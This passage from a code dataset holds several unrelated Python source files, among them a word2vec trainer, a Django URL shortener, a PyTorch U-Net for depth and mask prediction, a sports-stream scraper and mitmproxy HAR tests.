Image\")\nplt.xticks([])\nplt.yticks([])\nplt.xlabel(\"x-axis\")\nplt.ylabel(\"y-axis\")\nplt.show()\n\ncv2.imshow(\"image :\", img)  # errors here\ncap.release()\n","repo_name":"RakeshKumar045/Artificial_Inelligence_Complete_2","sub_path":"Images_Open_CV/Open_CV2/Sample_Test_Open_CV2/Video_Camera_Image/Video_Image_Capture.py","file_name":"Video_Image_Capture.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"43464219144","text":"'''\n\n'''\nimport pandas as pd\nimport numpy as np\nimport os\nimport pickle\nimport multiprocessing\nimport gensim.models.word2vec as word2vec\n\n\nSEED = 2\nSKILL_LIST_PATH = 'triplet_loss_embedding_skills.pickle'\n\n# loading our skills\n#skillsArray = np.load(SKILL_LIST_PATH)\nwith open(SKILL_LIST_PATH, 'rb') as f:\n\tskillsArray = pickle.load(f)\nprint(skillsArray[:200])\n\n# now we will build a word2vec model using the one built into gensim\n\ndimensions = 200\n# here dimensions is the dimensionality of the vectors that we want.\n# The more dimensions, the more accurate and more general the model is,\n# but the computational cost will increase\n\nminWordCount = 1\n# this is the minimum count threshold that a word should cross to get registered\n\n#workers = multiprocessing.cpu_count()\n# this is to use multiprocessing\n\ncontextSize = 7\n# this is the length of the sentence that would be considered in one context\n\n#downsample = 1e-5\n# for frequent words we use downsampling\nprint('building word2vec from gensim')\nmodel = word2vec.Word2Vec(sg=1, seed=1, size = dimensions, min_count=minWordCount,\n                          window=contextSize)\n# here we have just made the model, not fed data into it\n\n# now we will build the vocabulary for the model and then print how many words got into the vocab\n# not all will make it, due to the mincount parameter and such\n\nmodel.build_vocab(skillsArray)\nprint('Done with building vocab for model.')\nprint('vocab that got into length : ',model.wv.vocab.__len__())\n#print('vocab :', model.wv.vocab)\n# now we'll train the model with tokens\n\n
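Once trained, the model supports nearest-neighbour queries over the skill vocabulary; a usage sketch, written as comments because it needs the trained model in memory (the query token is illustrative):

# similar = model.wv.most_similar('python', topn=5)  # 5 closest skills by cosine similarity
# vec = model.wv['python']                           # the 200-dim embedding itself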
print('going into training. May take time...')\n\nmodel.train(skillsArray, total_examples= model.corpus_count, epochs=model.iter)\n\nprint('Successfully done training!')\nprint('Now moving to saving the model under the name trained')\n\nif not os.path.exists('trained_word2vec'):\n    os.makedirs('trained_word2vec')\n\nmodel.save(os.path.join('trained_word2vec', 'model.w2v'))\n\nprint('Saved the trained model')\n","repo_name":"saransh-mehta/Self_supervised_triplet_learning","sub_path":"word2vec_initial/word2vec_embedding_gensim_model.py","file_name":"word2vec_embedding_gensim_model.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"14723438694","text":"from django.shortcuts import render,redirect\nfrom .models import UrlInput,Stat\nfrom .forms import UrlInputForm\nimport random\nimport string\nimport json\nfrom pprint import pprint\nfrom datetime import datetime,timedelta\nfrom django.contrib.gis.geoip2 import GeoIP2\nfrom django.db.models import Count\nfrom django.utils.safestring import mark_safe\nimport collections\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\nfrom django.conf import settings\n# import ipdb; ipdb.set_trace()\nhost = settings.HOST[0]\n\n# Create your views here.\ndef showHome(request):\n    if(request.method =='POST'):\n        form = UrlInputForm(request.POST) \n        if form.is_valid():\n            post = form.save(commit = False) \n            post.shorten_url = randomStringDigit(8) \n            post.save()\n            return render(request,'home.html',{'form' : form,'shortenedUrl' : post.shorten_url,'host':host}) \n\n    form = UrlInputForm() \n    return render(request,'home.html',{'form' : form,'host':host}) \n\n\ndef randomStringDigit(args):\n    lettersAndDigits = string.ascii_lowercase + string.digits + string.ascii_uppercase\n    key = ''.join(random.choice(lettersAndDigits) for i in range(args))\n    return key\n\n\ndef urlRedirect(request,keyCode):\n    requiredUrl = UrlInput.objects.get(shorten_url = keyCode)\n    \n    # getting the visitor's ip and country \n    ip_add = get_ip_address(request)\n    g = GeoIP2()\n    country_value = ''\n    try:\n        country_value = (g.country_name(ip_add))\n    except: \n        print(\"Oops! 
That was not available in database.Try again...\")\n country_value = 'Not Available'\n \n \n row_created = Stat(url_input_details =requiredUrl,ip_address = ip_add,country = country_value) # object created for stat model \n row_created.save()\n return redirect(str(requiredUrl.url))\n\n\ndef get_ip_address(request):\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[-1].strip()\n else:\n ip = request.META.get('REMOTE_ADDR') \n return ip\n\ndef info(request,keyCode):\n data = UrlInput.objects.get(shorten_url = keyCode)\n infos = data.stats.all()\n \n last_7_days = datetime.today() - timedelta(days = 7)\n data_for_bar_graph = infos.filter(url_hit_time__gte = last_7_days).extra(select = {'day':'date(url_hit_time)'}).values('day').annotate(hits =Count('id')).order_by('day') \n \n # dictionary_comprehensions \n date_hits = {i['day']:i['hits'] for i in data_for_bar_graph}\n \n #date to compare\n required_date =[]\n for i in range(0,7):\n required_date.append((datetime.today().date()-timedelta(days =i)).strftime('%Y-%m-%d'))\n\n #inserting value 0 in dates which does not exist in the records\n for i in required_date:\n if i in date_hits.keys():\n pass \n else: \n date_hits[i] = 0 \n sorted_date_hits = collections.OrderedDict(sorted(date_hits.items()))\n \n #extracting date and hits for graph\n date =[]\n hits_no =[]\n for key,value in sorted_date_hits.items():\n date.append(key)\n hits_no.append(value) \n\n args = {'keycode':keyCode,'infos': infos,'data' : data,'date' : mark_safe(date),'hits_no' :hits_no,'host':host}\n return render(request,'info.html',args) \n\n@csrf_exempt\ndef api_request(request):\n if(request.method == 'POST'):\n\n urlpost = request.POST['url'] \n shorten_code =randomStringDigit(8)\n shorten_url_post = \"http://127.0.0.1:8000/\"+ shorten_code\n\n data = {\n \"long url\" : urlpost,\n \"short url\": shorten_url_post \n }\n new_row = UrlInput(url = urlpost,shorten_url = shorten_code)\n new_row.save()\n return JsonResponse(data)\n \n","repo_name":"rubinakarki/Url-shortner","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"4548336192","text":"# Fixtures in conftest.py will be available to every test inside the same folder\n\nfrom typing import Final\n\nimport pytest\nfrom flask import Flask\n\nfrom app import create_app\n\npytest_plugins = [\"tests.fixtures\"]\n\n\n@pytest.fixture()\ndef app():\n app: Final[Flask] = create_app(env=\"testing\")\n\n with app.app_context():\n yield app\n\n\n@pytest.fixture()\ndef client(app: Flask):\n with app.test_client() as client:\n yield client\n","repo_name":"antalvarenga/flask-boilerplate","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"15997290402","text":"import argparse\nimport asyncio\nimport logging\nimport sys\n\nfrom examples.interactiveLocal.HomeEasyCmd import HomeEasyCmd\n\nlogging.basicConfig(\n level=logging.DEBUG\n)\n\nparser = argparse.ArgumentParser(description='HomeEasy HVAC interactive tool.')\nparser.add_argument(\"-i\", \"--ip\", type=str,\n help=\"Set default device ip address\")\nparser.add_argument(\"-u\", \"--update\", action='store_true',\n help=\"Do update for default device at start\")\n\nargs = parser.parse_args()\n\n# For win system we have only 
Run mode\n# For POSIX system Reader mode is preferred\n\nif sys.platform == 'win32':\n loop = asyncio.ProactorEventLoop()\n mode = \"Run\"\nelse:\n loop = asyncio.get_event_loop()\n mode = \"Reader\"\n# create instance\ncmd = HomeEasyCmd(mode=mode)\n\ncmd.start(loop) # prepaire instance\n\nif args.ip is not None:\n print(f\"Device IP: {args.ip}\")\n cmd.do_ip(args.ip)\n\nif args.update:\n if args.ip is None:\n print(f\"Device ip is required\")\n exit(1)\n cmd.do_update()\n\ntry:\n loop.run_forever() # our cmd will run automatilly from this moment\nexcept KeyboardInterrupt:\n loop.stop()\n","repo_name":"ki0ki0/homeeasylib","sub_path":"examples/interactiveLocal/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"71688074923","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass Resnet_Block(nn.Module):\n def __init__(self,in_channels,out_channels):\n super(Resnet_Block, self).__init__()\n # Input Block\n\n self.conv1 = nn.Sequential(\n \n nn.BatchNorm2d(in_channels),\n nn.ReLU(),\n nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(3, 3), padding=1, bias=False), \n \n nn.BatchNorm2d(out_channels),\n nn.ReLU(),\n nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=(3, 3), padding=1, bias=False), \n )\n \n self.shortcut = nn.Sequential(\n nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(1, 1), padding=0, bias=False),\n )\n\n def forward(self,x):\n out = self.conv1(x)\n \n one = self.shortcut(x)\n # print(out.size(),x.size(),one.size())\n out += one\n return out\n\nclass Downsample(nn.Module):\n def __init__(self,in_channels,out_channels):\n super(Downsample, self).__init__()\n # Input Block\n \n self.conv1 = nn.Sequential(\n \n # nn.BatchNorm2d(in_channels),\n # nn.ReLU(),\n nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(3, 3), padding=1, bias=False,stride=2), \n \n # nn.BatchNorm2d(out_channels),\n # nn.ReLU(),\n # nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=(3, 3), padding=1, bias=False), \n )\n \n # self.shortcut = nn.Sequential(\n # nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(1, 1), padding=0, bias=False,stride=2),\n # )\n\n def forward(self,x):\n out = self.conv1(x)\n \n # one = self.shortcut(x)\n # print('---',out.size(),x.size(),one.size())\n # out += one\n return out\n\nclass Upsample(nn.Module):\n def __init__(self,in_channels,out_channels):\n super(Upsample, self).__init__()\n # Input Block\n \n self.conv1 = nn.Sequential(\n \n # nn.BatchNorm2d(in_channels),\n # nn.ReLU(),\n nn.ConvTranspose2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(2, 2), padding=0, bias=False,stride=2), \n \n # nn.BatchNorm2d(out_channels),\n # nn.ReLU(),\n # nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=(3, 3), padding=1, bias=False), \n )\n \n # self.shortcut = nn.Sequential(\n # nn.ConvTranspose2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(1, 1), padding=0, bias=False,stride=2),\n # )\n\n def forward(self,x):\n out = self.conv1(x)\n \n # one = self.shortcut(x)\n # print('---',out.size(),x.size(),one.size())\n # out += one\n return out\n\ndef final_layer(in_channels,out_channels):\n return nn.Sequential(\n \n nn.BatchNorm2d(in_channels),\n nn.ReLU(),\n nn.Conv2d(in_channels=in_channels, 
out_channels=out_channels, kernel_size=(3, 3), padding=1, bias=False), \n nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=(3, 3), padding=1, bias=False), \n ) \n \nclass Unet_Resnet(nn.Module):\n def __init__(self):\n super(Unet_Resnet, self).__init__()\n # Input Block\n\n self.conv1 = nn.Conv2d(in_channels=6, out_channels=64, kernel_size=(3, 3), padding=1, bias=False)\n \n \n \n self.enc1 = Resnet_Block(64,64)\n self.enc2 = Resnet_Block(128,128)\n self.enc3 = Resnet_Block(128,128)\n self.enc4 = Resnet_Block(256,256)\n self.enc5 = Resnet_Block(256,256)\n\n self.enc1_down = Downsample(64,128) \n self.enc2_down = Downsample(128,128)\n self.enc3_down = Downsample(128,256)\n self.enc4_down = Downsample(256,256)\n\n self.dec1_1 = final_layer(64,1)\n self.dec1 = Resnet_Block(128,64)\n self.dec2 = Resnet_Block(256,128)\n self.dec3 = Resnet_Block(256,128)\n self.dec4 = Resnet_Block(512,256)\n # self.dec5 = Resnet_Block(128,128)\n\n\n self.dec1_up = Upsample(128,64) \n self.dec2_up = Upsample(128,128)\n self.dec3_up = Upsample(256,128)\n self.dec4_up = Upsample(256,256)\n\n\n self.Mdec1_1 = final_layer(64,1)\n self.Mdec1 = Resnet_Block(128,64)\n self.Mdec2 = Resnet_Block(256,128)\n self.Mdec3 = Resnet_Block(256,128)\n self.Mdec4 = Resnet_Block(512,256)\n # self.Mdec5 = Resnet_Block(128,128)\n\n\n self.Mdec1_up = Upsample(128,64) \n self.Mdec2_up = Upsample(128,128)\n self.Mdec3_up = Upsample(256,128)\n self.Mdec4_up = Upsample(256,256)\n\n self.sigmoid = nn.LogSigmoid()\n self.relu = nn.ReLU()\n\n def forward(self,x):\n\n out1 = self.conv1(x) # o/p 64x64x64\n # print('out1',out1.size())\n en1 = self.enc1(out1) # 64x64x64\n # print('en1',en1.size())\n en1_1 = self.enc1_down(en1) # 128x32x32\n # print('en1_1',en1_1.size())\n en2 = self.enc2(en1_1) # 128x32x32\n # print('en2',en2.size())\n en2_1 = self.enc2_down(en2) # 128x16x16\n # print('en2_1',en2_1.size())\n en3 = self.enc3(en2_1) # 128x16x16\n # print('en3',en3.size())\n en3_1 = self.enc3_down(en3) # 256x8x8\n # print('en3_1',en3_1.size())\n\n en4 = self.enc4(en3_1) # 256x8x8\n # print('en4',en4.size())\n en4_1 = self.enc4_down(en4) # 256x4x4\n # print('en4_1',en4_1.size())\n\n en5 = self.enc5(en4_1) # 512x4x4\n # print('en5',en5.size())\n\n# depth\n de4 = self.dec4_up(en5) # 128x8x8\n # print('de4',de4.size())\n de4_1 = torch.cat((en4,de4 ),1) # 256x8x8\n # print('de4_1',de4_1.size())\n\n de4_1 = self.dec4(de4_1) # 128x8x8\n # print('de4_1',de4_1.size())\n\n de3 = self.dec3_up(de4_1) # 64x16x16\n # print('de3',de3.size())\n de3_1 = torch.cat((en3,de3 ),1) # 128x16x16\n # print('de3_1',de3_1.size())\n\n de3_1 = self.dec3(de3_1) # 64x16x16\n # print('de3_1',de3_1.size())\n \n de2 = self.dec2_up(de3_1) # 64x32x32\n # print('de2',de2.size())\n\n de2_1 = torch.cat((en2,de2 ),1) # 128x32x32\n # print('de2_1',de2_1.size())\n\n de2_1 = self.dec2(de2_1) # 64x32x32\n # print('de2_1',de2_1.size())\n \n de1 = self.dec1_up(de2_1) # 32x64x64\n # print('de1',de1.size())\n de1_1 = torch.cat((en1,de1),1) # 64x64x64\n # print('de1_1',de1_1.size())\n\n de1_1 = self.dec1(de1_1) # 32x64x64\n # print('de1_1',de1_1.size())\n de1_2 = self.dec1_1(de1_1) # 3x64x64\n # print('de1_2',de1_2.size())\n \n\n# mask\n\n Mde4 = self.Mdec4_up(en5) # 128x8x8\n # print('Mde4',Mde4.size())\n Mde4_1 = torch.cat((en4,Mde4 ),1) # 256x8x8\n # print('Mde4_1',Mde4_1.size())\n\n Mde4_1 = self.Mdec4(Mde4_1) # 128x8x8\n # print('Mde4_1',Mde4_1.size())\n\n Mde3 = self.Mdec3_up(Mde4_1) # 64x16x16\n # print('Mde3',Mde3.size())\n Mde3_1 = torch.cat((en3,Mde3 ),1) # 
128x16x16\n # print('Mde3_1',Mde3_1.size())\n\n Mde3_1 = self.Mdec3(Mde3_1) # 64x16x16\n # print('Mde3_1',Mde3_1.size())\n \n Mde2 = self.Mdec2_up(Mde3_1) # 64x32x32\n # print('Mde2',Mde2.size())\n\n Mde2_1 = torch.cat((en2,Mde2 ),1) # 128x32x32\n # print('Mde2_1',Mde2_1.size())\n\n Mde2_1 = self.Mdec2(Mde2_1) # 64x32x32\n # print('Mde2_1',Mde2_1.size())\n \n Mde1 = self.Mdec1_up(Mde2_1) # 32x64x64\n # print('Mde1',Mde1.size())\n Mde1_1 = torch.cat((en1,Mde1),1) # 64x64x64\n # print('Mde1_1',Mde1_1.size())\n\n Mde1_1 = self.Mdec1(Mde1_1) # 32x64x64\n # print('Mde1_1',Mde1_1.size())\n Mde1_2 = self.Mdec1_1(Mde1_1) # 3x64x64\n # print('Mde1_2',Mde1_2.size())\n\n\n \n\n return Mde1_2, de1_2 # mask,depth","repo_name":"m-shilpa/machine_learning","sub_path":"deployment/api/predictor/model_architecture.py","file_name":"model_architecture.py","file_ext":"py","file_size_in_byte":8028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3389994772","text":"import re\nfrom sports_streaming import util\nfrom sports_streaming.streamers.models import FootballStreamer\nfrom sports_streaming.streams.models import FootballStream\n\n\nNFL_STREAMER_TABLE = 'https://sportscentral.io/streams-table/{0}/american-football?new-ui=1'\n\ndef get_best_streamer(streams_link):\n return _get_weak_spell(streams_link)\n\n\ndef _get_weak_spell(streams_link):\n game_id = _get_game_id(streams_link)\n streamers = get_streamers(game_id)\n weak_spell = next(\n (streamer for streamer in streamers if streamer.name == 'Weak_Spell'),\n None\n )\n if weak_spell is None:\n raise util.errors.NoWeakSpellFound(game_id=game_id)\n return weak_spell\n\ndef _get_game_id(streams_link):\n pattern = 'streamsMatchId = ([0-9]+);'\n soup = util.soup.get_soup(streams_link)\n scripts = soup.select('script')\n game_id = None\n for script in scripts:\n content = script.string\n if content is None:\n continue\n match = re.search(pattern, content)\n if match is None:\n continue\n game_id = match.group(1)\n break\n if game_id is None:\n raise util.errors.NoGameIdFound(streams_link=streams_link)\n return game_id\n\ndef get_streamers(game_id):\n soup = util.soup.get_soup(NFL_STREAMER_TABLE.format(game_id))\n\n # headers = soup.select_one('#streams table > thead > tr')\n streamers = soup.select('table > tbody > tr')\n streamers = [\n _parse_streamer(streamer, rank)\n for rank, streamer in enumerate(streamers, start=1)\n ]\n if not streamers:\n raise util.errors.NoStreamersFound(game_id=game_id)\n return streamers\n\n\n# td elements within each streamer tr\n# 1 = logo\n# 2 = rank\n# 3 = name\n# 4 = reputation\n# 5 = quality\n# 6 = language\n# 7 = ads\n# 8 = channel\n# 9 = popularity\ndef _parse_streamer(streamer, rank):\n name = streamer.select_one(':nth-child(3)')\n reputation = streamer.select_one(':nth-child(4)')\n quality = streamer.select_one(':nth-child(5)')\n ads = streamer.select_one(':nth-child(7)')\n channel = streamer.select_one(':nth-child(8)')\n popularity = streamer.select_one(':nth-child(9) span.votes-count')\n\n return FootballStreamer(\n util.soup.get_stripped_strings(name)[0],\n FootballStream(streamer.get('data-stream-link')),\n str(rank),\n util.soup.get_stripped_strings(reputation)[0],\n util.soup.get_stripped_strings(quality)[0],\n util.soup.get_stripped_strings(ads)[0],\n util.soup.get_stripped_strings(channel)[0],\n util.soup.get_stripped_strings(popularity)[0]\n 
)\n","repo_name":"jlemieux/SportsStreaming","sub_path":"back-end/sports_streaming/streamers/football/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27424719754","text":"from tqdm import tqdm\r\nimport numpy as np\r\n\r\n\r\n# Deflector is a meta-system for relation extraction\r\n# that can exploit any link prediction system\r\n# to improve any relation extraction system \r\nclass Deflector:\r\n\r\n    # Initialization: \r\n    # re_wrapper: a function that can be defined arbitrarily; internally\r\n    # it receives the same input as the RE model,\r\n    # but it must return the input formatted as a list of triples: [(e1, pattern0, e2)] \r\n    # and the output as a list of relations: [(pattern0, relation0, (e1, e2))], both of the same size\r\n    # lp_wrapper_fun: a function that can be defined arbitrarily\r\n    # internally, but it must take as input a list of instances [(e1, e2)]\r\n    # and must return [{set of top relations for e1 e2}]\r\n    # PRE: input and output sizes must be identical, and relations that cannot be\r\n    # extracted or predicted must be associated with the string 'unknown' \r\n    def __init__(self, re_wrapper, lp_wrapper):\r\n        self.relation_extraction_model = re_wrapper\r\n        self.link_prediction_model = lp_wrapper\r\n        self.pattern_black_list = dict() # {pattern: (old_relation, score)}\r\n        self.pattern_discovery = dict() # {pattern: (new_relation, score)} # only for formerly unknown relations\r\n\r\n\r\n    # Apply the filters on the output instead of the input\r\n    def extract_relations(self, re_input, keep_unknown=False, keep_patterns=False, keep_pairs=False):\r\n        \r\n        # Formatted input and output of the relation extraction model\r\n        re_output = self.relation_extraction_model.extract_relations(re_input)\r\n\r\n        # Filter the relation extraction output \r\n        output = list()\r\n        for pattern, relation, pair in re_output:\r\n            sbj, obj = pair\r\n            if relation != 'unknown':\r\n                try:\r\n                    self.pattern_black_list[pattern]\r\n                    output.append((pattern, (sbj, 'unknown', obj)))\r\n                except:\r\n                    output.append((pattern, (sbj, relation, obj)))\r\n            else:\r\n                try:\r\n                    new_rel = self.pattern_discovery[pattern][0]\r\n                    output.append((pattern, (sbj, new_rel, obj)))\r\n                except:\r\n                    output.append((pattern, (sbj, relation, obj)))\r\n\r\n        # If facts with relation 'unknown' should be excluded\r\n        if not keep_unknown:\r\n            output = [x for x in output if x[1][1] != 'unknown']\r\n\r\n        # If the pairs should not be kept in the output as well\r\n        if not keep_pairs:\r\n            output = [(x[0], x[1][1]) for x in output]\r\n\r\n        # Do not keep track of the pattern that predicted the fact\r\n        if not keep_patterns:\r\n            output = [x[1] for x in output] \r\n\r\n        return output\r\n\r\n\r\n    # From dictionary: {pattern: (relation, [(subject, object), ...]), ...}\r\n    # To dictionary: {(pair): {set of predictions}}\r\n    def batch_predict(self, pattern2relpairs, link_predictor, batch_size):\r\n\r\n        # Init output structure\r\n        all_pairs = set()\r\n        print('\\nFinding all unique pairs to be predicted...')\r\n        for _, pairs in tqdm(pattern2relpairs.values()):\r\n            for pair in pairs:\r\n                all_pairs.add(pair)\r\n\r\n        # Batch predict\r\n        all_pairs = list(all_pairs)\r\n        result = list()\r\n        print('\\nBatch predicting relations...')\r\n        for i in tqdm(range(0, len(all_pairs), batch_size)):\r\n            result += zip(all_pairs[i:i+batch_size], link_predictor.predict_links(all_pairs[i:i+batch_size]))\r\n\r\n
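        # Illustrative example (hypothetical values): with batch_size=2 and pairs [('Rome', 'Italy'),\r\n        # ('Oulu', 'Finland')], the dict returned below could look like {('Rome', 'Italy'): {'capital_of'},\r\n        # ('Oulu', 'Finland'): {'located_in'}}; the relation names depend on the wrapped link predictor.\r\n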
        return dict(result)\r\n\r\n\r\n    # Identify weak patterns and add them to the black list\r\n    def deflect_patterns(self, re_input, bs=5000, bl_min_len=1, bl_thresh=0.7, pd_min_len=10, pd_thresh=0.7, pd_enabled=False):\r\n\r\n        # Trace the extracted relations\r\n        ex_trace = self.extract_relations(re_input, keep_unknown=True, keep_patterns=True, keep_pairs=True)\r\n\r\n        # Build a dictionary {pattern: (relation, [(subject, object), ...]), ...} (in other words: clustering)\r\n        pattern2instances = dict()\r\n        for pattern, opinion in ex_trace:\r\n            try:\r\n                sbj, _, obj = opinion\r\n                pattern2instances[pattern][1].append((sbj, obj))\r\n            except:\r\n                sbj, relation, obj = opinion \r\n                pattern2instances[pattern] = (relation, [(sbj, obj)])\r\n\r\n        # Keep a structure with all known patterns and their associated relations\r\n        self.pattern2relation = [(x[0], x[1][0]) for x in pattern2instances.items() if x[1][0] != 'unknown']\r\n\r\n        # Build dictionary {pair: predicted relations as a set}\r\n        pair2pred = self.batch_predict(pattern2instances, self.link_prediction_model, batch_size=bs)\r\n        \r\n        self.get_statistics(pattern2instances, pair2pred) # New: this will collect some statistics about clusters\r\n\r\n        print('\\nDeflecting patterns...')\r\n        for pattern, track in tqdm(pattern2instances.items()):\r\n            relation, pairs = track \r\n            predictions = [pair2pred[pair] for pair in pairs if 'unknown' not in pair2pred[pair]]\r\n            preds_len = len(predictions)\r\n            if relation != 'unknown' and preds_len >= bl_min_len:\r\n                matches = [relation in pred for pred in predictions] \r\n                pattern_score = sum(matches)/len(matches)\r\n                # Pattern blacklist\r\n                if pattern_score < bl_thresh: \r\n                    self.pattern_black_list[pattern] = (relation, pattern_score) \r\n            elif pd_enabled and preds_len >= pd_min_len:\r\n                all_pred_size = [len(pred) for pred in predictions]\r\n                rel2weight = dict()\r\n                for n, preds in enumerate(predictions):\r\n                    for rel in preds:\r\n                        try:\r\n                            rel2weight[rel] += 1/all_pred_size[n]\r\n                        except:\r\n                            rel2weight[rel] = 1/all_pred_size[n]\r\n                \r\n                max_rel1 = max(rel2weight, key=rel2weight.get)\r\n                max_wgh1 = rel2weight[max_rel1]\r\n                del(rel2weight[max_rel1])\r\n                try: \r\n                    max_rel2 = max(rel2weight, key=rel2weight.get)\r\n                    max_wgh2 = rel2weight[max_rel2]\r\n                except:\r\n                    max_wgh2 = 0\r\n\r\n                max_rel_score = (max_wgh1 - max_wgh2)/len(pairs)\r\n                # Pattern discovery\r\n                if max_rel_score >= pd_thresh:\r\n                    self.pattern_discovery[pattern] = (max_rel1, max_rel_score)\r\n\r\n\r\n    # Compute some statistics on the clusters of pairs associated with a pattern\r\n    def get_statistics(self, pattern2track, pair2pred):\r\n        \r\n        self.statistics = {'total_clusters': np.int32(0),\r\n                           'cluster_sizes': [],\r\n                           'unknown_sizes': [],\r\n                           'known_sizes': [],\r\n                           'unknown_perc': []}\r\n\r\n        # Iterate over each cluster of pairs belonging to a\r\n        # pattern-relation association learned by Lector\r\n        for _, track in pattern2track.items():\r\n            relation, pairs = track\r\n            \r\n            # Skip patterns associated with no relation\r\n            if relation == 'unknown':\r\n                continue \r\n\r\n            predictions = [pair2pred[pair] for pair in pairs]\r\n            cluster_size = len(predictions)\r\n            unknown_size = len([p for p in predictions if 'unknown' in p])\r\n\r\n            self.statistics['total_clusters'] += 1\r\n            self.statistics['cluster_sizes'].append(cluster_size)\r\n            self.statistics['unknown_sizes'].append(unknown_size)\r\n            self.statistics['known_sizes'].append(cluster_size - unknown_size)\r\n
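            # unknown_perc: share of this cluster's pairs for which the link predictor returned 'unknown'\r\n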
            self.statistics['unknown_perc'].append(unknown_size/cluster_size)\r\n        \r\n\r\n        # Aggregate the results\r\n\r\n        # Statistics on cluster sizes\r\n        for name in ['cluster', 'unknown', 'known']:\r\n            self.statistics[f'mean_{name}_size'] = np.mean(self.statistics[f'{name}_sizes'])\r\n            self.statistics[f'max_{name}_size'] = np.max(self.statistics[f'{name}_sizes'])\r\n            self.statistics[f'min_{name}_size'] = np.min(self.statistics[f'{name}_sizes'])\r\n            self.statistics[f'std_{name}_size'] = np.std(self.statistics[f'{name}_sizes'])\r\n            # Mean percentage and standard deviation of 'unknown' predictions in a cluster\r\n            if name == 'unknown':\r\n                self.statistics[f'mean_{name}_perc'] = np.mean(self.statistics[f'{name}_perc'])\r\n                self.statistics[f'std_{name}_perc'] = np.std(self.statistics[f'{name}_perc'])\r\n\r\n        # Clusters containing only unknown (the LP model does not know at least one of the two entities)\r\n        self.statistics['unknown_clusters'] = np.int32(0)\r\n        for n, size in enumerate(self.statistics['cluster_sizes']):\r\n            if size == self.statistics['unknown_sizes'][n]:\r\n                self.statistics['unknown_clusters'] += 1\r\n\r\n        # Remove the keys associated with lists of values\r\n        del(self.statistics['cluster_sizes'])\r\n        del(self.statistics['unknown_sizes'])\r\n        del(self.statistics['known_sizes'])\r\n        del(self.statistics['unknown_perc'])\r\n        \r\n\r\n        \r\n\r\n        \r\n","repo_name":"3rr4t1c/deflector-knowledge-antani","sub_path":"deflector.py","file_name":"deflector.py","file_ext":"py","file_size_in_byte":9562,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20725640590","text":"import json\nfrom pathlib import Path\n\nimport pytest\nfrom readhar import ReadHar\n\nfrom mitmproxy import exceptions\nfrom mitmproxy import types\nfrom mitmproxy.tools.web.app import flow_to_json\n\nhere = Path(__file__).parent.absolute()\n\n\ndef hardcode_variable_fields_for_tests(flow: dict) -> None:\n    flow[\"id\"] = \"hardcoded_for_test\"\n    flow[\"timestamp_created\"] = 0\n    flow[\"server_conn\"][\"id\"] = \"hardcoded_for_test\"\n    flow[\"client_conn\"][\"id\"] = \"hardcoded_for_test\"\n\n\ndef file_to_flows(path_name: Path) -> list[dict]:\n    r = ReadHar()\n    with open(path_name, \"rb\") as f:\n        file_json = json.load(f)[\"log\"][\"entries\"]\n    flows = []\n\n    for entry in file_json:\n        expected = r.request_to_flow(entry)\n        flow_json = flow_to_json(expected)\n        hardcode_variable_fields_for_tests(flow_json)\n        flows.append(flow_json)\n\n    return flows\n\n\ndef test_corrupt():\n    r = ReadHar()\n\n    pytest.raises(\n        exceptions.CommandError, r.read_har, types.Path(\"./corrupted/brokenfile.har\")\n    )\n    with open(\"./corrupted/broken_headers.json\") as f:\n        file_json = json.load(f)\n    pytest.raises(exceptions.OptionsError, r.fix_headers, file_json[\"headers\"])\n\n\n@pytest.mark.parametrize(\n    \"har_file\", [pytest.param(x, id=x.stem) for x in here.glob(\"har_files/*.har\")]\n)\ndef test_har_to_flow(har_file: Path):\n    expected_file = har_file.with_suffix(\".json\")\n\n    expected_flows = json.loads(expected_file.read_bytes())\n    actual_flows = file_to_flows(har_file)\n\n    for expected, actual in zip(expected_flows, actual_flows):\n        actual = json.loads(json.dumps(actual))\n\n        assert actual == expected\n\n\nif __name__ == \"__main__\":\n    for path_name in here.glob(\"har_files/*.har\"):\n        print(path_name)\n\n        flows = file_to_flows(path_name)\n\n        with open(f\"har_files/{path_name.stem}.json\", \"w\") as f:\n            json.dump(flows, f, 
